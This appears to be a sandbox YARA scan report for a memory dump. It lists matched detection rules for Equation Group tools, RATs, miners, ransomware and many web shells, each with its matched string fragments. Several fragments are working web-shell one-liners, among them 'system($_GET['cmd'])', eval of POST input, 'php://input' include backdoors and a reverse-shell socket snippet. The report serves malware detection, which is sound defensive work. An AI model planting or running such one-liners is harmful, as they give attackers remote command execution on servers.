00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup__ftshell_ftshell_v3_10_3_0	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0xa1abd:$s3: system rm -f /current/tmp/ftshell.latest 0xa1b03:$s4: # ftshell -- File Transfer Shell
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup__scanner_scanner_v2_1_2	Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2	Florian Roth	0x8355c:$s1: Welcome to the network scanning tool 0xa1dc9:$s1: Welcome to the network scanning tool 0xa1e0b:$s2: Scanning port %d 0xa1e39:$s3: /current/down/cmdout/scans 0xa1e71:$s4: Scan for SSH version 0xa1ea3:$s5: program vers proto port service
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup__ghost_sparc_ghost_x86_3	Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86	Florian Roth	0xa216d:$x1: Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target 0xa21c8:$x2: Sending shellcode as part of an open command... 0xa2215:$x3: cmdshellcode 0xa223f:$x4: You will not be able to run the shellcode. Exiting...
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup__jparsescan_parsescan_5	Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan	Florian Roth	0xa2857:$s1: # default is to dump out all scanned hosts found 0xa28e9:$s3: sadmind is available on two ports, this also works)
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup__ftshell	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0xa3361:$s1: if { [string length $uRemoteUploadCommand] 0xa33a9:$s2: processUpload 0xa33d4:$s3: global dothisreallyquiet
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_Eternalromance	Detects EquationGroup Tool - April Leak	Florian Roth	0x810e6:$x1: [-] Error: Exploit choice not supported for target OS!! 0x8113b:$x2: Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed 0x811a0:$x3: [-] Error: Backdoor not present on target 0x811e7:$x4: ********* TARGET ARCHITECTURE IS X64 **********
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_Gen2	Detects EquationGroup Tool - April Leak	Florian Roth	0x81b64:$s1: [+] Setting password : (NULL) 0x81b9f:$s2: [-] TbBuffCpy() failed! 0x81bd4:$s3: [+] SMB negotiation 0x81c05:$s4: 12345678-1234-ABCD-EF00-0123456789AB 0x81c47:$s5: Value must end with 0000 (2 NULLs) 0x81c87:$s6: [] Configuring Payload 0x81cbc:$s7: [] Connecting to listener
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0	Detects EquationGroup Tool - April Leak	Florian Roth	0x8f9d8:$x1: DFReader.exe logfile AESKey [-j] [-o outputfilename] 0x8fa2a:$x2: Double Feature Target Version 0x8fa65:$x3: DoubleFeature Process ID
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4	Detects EquationGroup Tool - April Leak	Florian Roth	0x903dd:$x1: * Listening Post DLL %s() returned error code %d. 0x9042c:$s1: WsaErrorTooManyProcesses 0x80745:$s2: NtErrorMoreProcessingRequired 0x90462:$s2: NtErrorMoreProcessingRequired 0x7cc05:$s3: Connection closed by remote host (TCP Ack/Fin) 0x9049d:$s3: Connection closed by remote host (TCP Ack/Fin) 0x904e9:$s4: ServerErrorBadNamePassword
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	APT6_Malware_Sample_Gen	Rule written for 2 malware samples that communicated to APT6 C2 servers	Florian Roth	0xf2e28:$x2: SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>! 0xf2e8a:$x3: 636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146 0xf2efc:$s1: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 0xf2f60:$s2: DUMPTHIN 0xf2fbd:$s4: window.eval(f.decodeURIComponent(a)); 0xf3000:$s5: /tbedrs.dll 0xf3029:$s6: NSISDL/1.2 (Mozilla) 0xf305b:$s7: NSIS_Inetc (Mozilla) 0xf308d:$s8: /logos.gif 0xf30b5:$s9: synflood 0xf3126:$s11: udpflood 0x2d4f6:$s12: shellcode 0x2d90d:$s12: shellcode 0x2dab3:$s12: shellcode 0x421c1:$s12: shellcode 0x5c962:$s12: shellcode 0x5c9a9:$s12: shellcode 0x636cc:$s12: shellcode 0x6d2cd:$s12: shellcode 0x6d316:$s12: shellcode 0x6d32a:$s12: shellcode
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_CryptoMiner	Yara detected Crypto Miner	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_ComRAT_XORKey	Yara detected Turla ComRAT XORKey	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_Nukesped	Yara detected Nukesped	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_xtremerat_1	Yara detected Xtreme RAT	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_PupyRAT	Yara detected PupyRAT	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x75a31:$s1: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x75a09:$s5: iec104.log
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	fe_cpe_ms17_010_ransomware	probable petya ransomware using eternalblue, wmic, psexec	ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick	0x3958a:$dmap04: termsrv 0x11709f:$dmap04: termsrv 0x12e352:$dmap04: termsrv 0x12e3c8:$dmap04: termsrv 0x41cb5:$dmap05: \ADMIN$ 0x6ac23:$dmap05: \admin$ 0xf0a69:$dmap05: \admin$ 0x154a44:$dmap05: \ADMIN$ 0x198b64:$dmap06: GetLogicalDrives 0x6f26a:$msg05: your important files are encrypted 0x6f387:$msg10: Bitcoin wallet ID 0x2316a:$msg_pcre: encrypted. 0x4be62:$msg_pcre: decryption 0x4bfae:$msg_pcre: decryption 0x6f283:$msg_pcre: encrypted. 0x79bc1:$msg_pcre: decryption 0x8dae5:$msg_pcre: encryption 0x8db22:$msg_pcre: encryption 0x985b3:$msg_pcre: encryption 0xe8b6d:$msg_pcre: decrypted. 0x19919a:$msg_pcre: encryption
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Anthem_DeepPanda_lot1	Anthem Hack Deep Panda - lot1.tmp-pwdump	Florian Roth	0xd31fb:$s0: Unable to open target process: %d, pid %d 0x17e31e:$s0: Unable to open target process: %d, pid %d 0xd3dd8:$s1: Couldn't delete target executable from remote machine: %d 0x17e365:$s1: Couldn't delete target executable from remote machine: %d 0x17e3bc:$s2: Target: Failed to load SAM functions. 0x17e3ff:$s5: Error writing the test file %s, skipping this share 0x17e450:$s6: Failed to create service (%s/%s), error %d 0x17e498:$s8: Service start failed: %d (%s/%s) 0xd3b78:$s12: PwDump.exe 0x17e4d7:$s12: PwDump.exe 0x17e500:$s13: GetAvailableWriteableShare returned an error of %ld 0x17e581:$s15: Couldn't copy %s to destination %s. (Error %d) 0x17e5ce:$s16: dump logon session 0x17e5ff:$s17: Timed out waiting to get our pipe back 0x17e644:$s19: SetNamedPipeHandleState failed, error %d
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Anthem_DeepPanda_htran_exe	Anthem Hack Deep Panda - htran-exe	Florian Roth	0x1082c3:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0x1301e7:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0x17e87a:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0x108287:$s1: [-] Gethostbyname(%s) error:%s 0x1083b0:$s3: [SERVER]connection to %s:%d error 0x131d0e:$s3: [SERVER]connection to %s:%d error 0x13dac2:$s3: [SERVER]connection to %s:%d error 0x1577bb:$s3: [SERVER]connection to %s:%d error 0x17e8f0:$s3: [SERVER]connection to %s:%d error 0x1577fa:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort> 0x17e92f:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort> 0x10836e:$s5: [-] ERROR: Must supply logfile name. 0x131dd6:$s6: [-] There is a error...Create a new connection. 0x1578af:$s6: [-] There is a error...Create a new connection. 0x108476:$s7: [+] Accept a Client on port %d from %s 0x1578fc:$s7: [+] Accept a Client on port %d from %s 0x157a6d:$s7: [+] Accept a Client on port %d from %s 0x17e97f:$s8: ======================== htran V%s ======================= 0x157941:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0x17e9d8:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0x1084ba:$s12: [+] Make a Connection to %s:%d ......
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0x40301:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x4027f:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x40309:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x1796a1:$klg2: [Enter]
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Backdoor_WebShell_asp	Detect ASPXSpy	xylitol@temari.fr	0x145009:$string1: CmdShell 0x149b28:$string1: CmdShell 0x15d427:$string1: CmdShell 0x15d491:$string1: CmdShell 0x15d637:$string1: CmdShell 0x15d6f7:$string1: CmdShell 0x15d74d:$string1: CmdShell 0x10b78a:$string4: PortScan 0x1db90f:$string4: PortScan 0x1db974:$string4: PortScan 0x108e95:$plugin: Test.AspxSpyPlugins
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_iMHaPFtp_2	Web Shell - file iMHaPFtp.php	Florian Roth	0x1bf860:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_caidao_shell_guo	Web Shell - file guo.php	Florian Roth	0x1c04b4:$s0: <?php ($www= $_POST['ice'])! 0x1c04e0:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_redcod	Web Shell - file redcod.php	Florian Roth	0x1c06d6:$s0: H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw 0x1c0716:$s1: HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_php_sh_server	Web Shell - file server.php	Florian Roth	0x1c0b7f:$s0: eval(getenv('HTTP_CODE'));
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_cihshell_fix	Web Shell - file cihshell_fix.php	Florian Roth	0x1c11c2:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty 0x1c1222:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_php_up	Web Shell - file up.php	Florian Roth	0x1c1871:$s0: copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); 0x1c18ce:$s3: if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_asp_EFSO_2	Web Shell - file EFSO_2.asp	Florian Roth	0x1c2199:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_jsp_up	Web Shell - file up.jsp	Florian Roth	0x1c23a8:$s9: // BUG: Corta el fichero si es mayor de 640Ks
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_Server_Variables	Web Shell - file Server Variables.asp	Florian Roth	0x1c27e7:$s7: <% For Each Vars In Request.ServerVariables %> 0x1c282d:$s9: Variable Name</B></font></p>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_caidao_shell_ice_2	Web Shell - file ice.php	Florian Roth	0x1c2a1d:$s0: <?php ${${eval($_POST[ice])}};?>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_phpspy2010	Web Shell - file phpspy2010.php	Florian Roth	0x1166f0:$s3: eval(gzinflate(base64_decode( 0x14601a:$s3: eval(gzinflate(base64_decode( 0x1996e1:$s3: eval(gzinflate(base64_decode( 0x1a4e1a:$s3: eval(gzinflate(base64_decode( 0x1a7768:$s3: eval(gzinflate(base64_decode( 0x1c2fff:$s3: eval(gzinflate(base64_decode( 0x1cdbb2:$s3: eval(gzinflate(base64_decode( 0x1cf6de:$s3: eval(gzinflate(base64_decode( 0x1c302c:$s5: //angel 0x1c304b:$s8: $admin['cookiedomain'] = '';
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_asp_ice	Web Shell - file ice.asp	Florian Roth	0x1c3230:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_asp_404	Web Shell - file 404.asp	Florian Roth	0x1c3eba:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshell_cnseay02_1	Web Shell - file webshell-cnseay02-1.php	Florian Roth	0x1c40b9:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_php_fbi	Web Shell - file fbi.php	Florian Roth	0x1c42ca:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_B374kPHP_B374k	Web Shell - file B374k.php	Florian Roth	0x1d2571:$s0: Http://code.google.com/p/b374k-shell 0x1d25ad:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno' 0x1d260c:$s3: Jayalah Indonesiaku & Lyke @ 2013 0x1d2645:$s4: B374k Vip In Beautify Just For Self
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_php_list	Web Shell - file list.php	Florian Roth	0x1c4be3:$s1: // list.php = Directory & File Listing 0x1c4c81:$s9: // by: The Dark Raver
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_caidao_shell_404	Web Shell - file 404.php	Florian Roth	0x1c50c3:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_ASP_aspydrv	Web Shell - file aspydrv.asp	Florian Roth	0x1c52dc:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_Dx_Dx	Web Shell - file Dx.php	Florian Roth	0x1add21:$s9: class=linelisting><nobr>POST (php eval)</td>< 0x1c5bcd:$s9: class=linelisting><nobr>POST (php eval)</td><
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_MySQL_Web_Interface_Version_0_8	Web Shell - file MySQL Web Interface Version 0.8.php	Florian Roth	0x1c6015:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_phpkit_1_0_odd	Web Shell - file odd.php	Florian Roth	0x1c6982:$s0: include('php://input'); 0x1d2b08:$s0: include('php://input'); 0x1c69b1:$s1: // No eval() calls, no system() calls, nothing normally seen as malicious. 0x1c6a13:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script 0x1d2b37:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_wsb_idc	Web Shell - file idc.php	Florian Roth	0x1c77c9:$s1: if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass) 0x1c781b:$s3: {eval($_GET['idc']);}
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_php_404	Web Shell - file 404.php	Florian Roth	0x1c7e5d:$s0: $pass = md5(md5(md5($pass)));
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_webshell_cnseay_x	Web Shell - file webshell-cnseay-x.php	Florian Roth	0x1c805b:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_asp_up	Web Shell - file up.asp	Florian Roth	0x1c82b8:$s1: ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_phpkit_0_1a_odd	Web Shell - file odd.php	Florian Roth	0x1c6982:$s1: include('php://input'); 0x1d2b08:$s1: include('php://input'); 0x1c6a13:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script 0x1d2b37:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script 0x1d2b95:$s4: // uses include('php://input') to execute arbritary code 0x1d2be5:$s5: // php://input based backdoor
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_jsp_k81	Web Shell - file k81.jsp	Florian Roth	0x1c91d6:$s1: byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_jsp_cmdjsp	Web Shell - file cmdjsp.jsp	Florian Roth	0x1c9c97:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'> 0x1cddf6:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_Java_Shell	Web Shell - file Java Shell.jsp	Florian Roth	0x1c9e8f:$s4: public JythonShell(int columns, int rows, int scrollback) { 0x1c9ee2:$s9: this(null, Py.getSystemState(), columns, rows, scrollback);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_r57142	Web Shell - file r57142.php	Florian Roth	0x1ca6ef:$s0: $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_simple_backdoor	Web Shell - file simple-backdoor.php	Florian Roth	0x1ab4ec:$s0: $cmd = ($_REQUEST['cmd']); 0x1cae02:$s0: $cmd = ($_REQUEST['cmd']); 0x1cae34:$s1: if(isset($_REQUEST['cmd'])){ 0x1cae68:$s4: system($cmd);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_php_cmd	Web Shell - file cmd.php	Florian Roth	0x1cd4d5:$s0: if($_GET['cmd']) { 0x1cd4ff:$s1: // cmd.php = Command Execution 0x1cd535:$s7: system($_GET['cmd']);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_co	Web Shell - file co.php	Florian Roth	0x1cd960:$s0: cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV 0x1cd9a1:$s11: 6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_150	Web Shell - file 150.php	Florian Roth	0x1cdb92:$s0: HJ3HjqxclkZfp 0x1cdbaf:$s1: <? eval(gzinflate(base64_decode('
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_c37	Web Shell - file c37.php	Florian Roth	0x1cdfe4:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'), 0x1ce02d:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_b37	Web Shell - file b37.php	Florian Roth	0x1ce23e:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_PHP_bug_1_	Web Shell - file bug (1).php	Florian Roth	0x1d00c8:$s0: @include($_GET['bug']);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_ghost_source_icesword_silic	Web Shell - from files ghost_source.php, icesword.php, silic.php	Florian Roth	0x1d44e2:$s3: if(eregi('WHERE\|LIMIT',$_POST['nsql']) && eregi('SELECT\|FROM',$_POST['nsql'])) $ 0x1d4542:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download	Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp	Florian Roth	0x1d1866:$s4: UplInfo info = UploadMonitor.getInfo(fi.clientFileName); 0x1d18b6:$s5: long time = (System.currentTimeMillis() - starttime) / 1000l;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx	Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php	Florian Roth	0x1d6c70:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals 0x1d6ccc:$s9: if (ereg('^[[:blank:]]cd[[:blank:]]$', $_REQUEST['command'])) {
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_jsp_reverse_jsp_reverse_jspbd	Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp	Florian Roth	0x1d7183:$s0: osw = new BufferedWriter(new OutputStreamWriter(os)); 0x1d71d0:$s7: sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); 0x1d7227:$s9: isr = new BufferedReader(new InputStreamReader(is));
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx	Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php	Florian Roth	0x1b8b12:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI 0x1d7ac2:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI 0x1d7b23:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_itsec_PHPJackal_itsecteam_shell_jHn	Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php	Florian Roth	0x1d7df2:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('\| 0x1d7e52:$s9: while($data=pg_fetch_row($result))$res.=implode('\|-\|-\|-\|-\|-\|',$data).'\|+\|+\|+\|+\|+
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1	Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php	Florian Roth	0x1d8513:$s2: $uploadfile = $_POST['path'].$_FILES['file']['name']; 0x1d8560:$s6: elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz	Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php	Florian Roth	0x1d8bb0:$s0: $this -> addFile($content, $filename); 0x1d8bee:$s3: function addFile($data, $name, $time = 0) { 0x1d8c31:$s8: function unix2DosTime($unixtime = 0) { 0x1d8c6f:$s9: foreach($filelist as $filename){
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend	Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp	Florian Roth	0x1d965c:$s0: return new Double(format.format(value)).doubleValue(); 0x1d96aa:$s5: File tempF = new File(savePath); 0x1d96e2:$s9: if (tempF.isDirectory()) {
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0x1d99a4:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0x1d99f7:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_000_403_807_a_c5_config_css_dm_he1p_xxx	Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp	Florian Roth	0x1d9f42:$s4: URL downUrl = new URL(downFileUrl); 0x1d9f7d:$s5: if (Util.isEmpty(downFileUrl) \|\| Util.isEmpty(savePath)) 0x1da018:$s7: FileInputStream fInput = new FileInputStream(f); 0x1da060:$s8: URLConnection conn = downUrl.openConnection(); 0x1da0a6:$s9: sis = request.getInputStream();
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY	Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php	Florian Roth	0x143786:$s4: http://www.4ngel.net 0x18ce12:$s4: http://www.4ngel.net 0x1a95b8:$s4: http://www.4ngel.net 0x1da8db:$s4: http://www.4ngel.net 0x1da98d:$s9: Codz by Angel
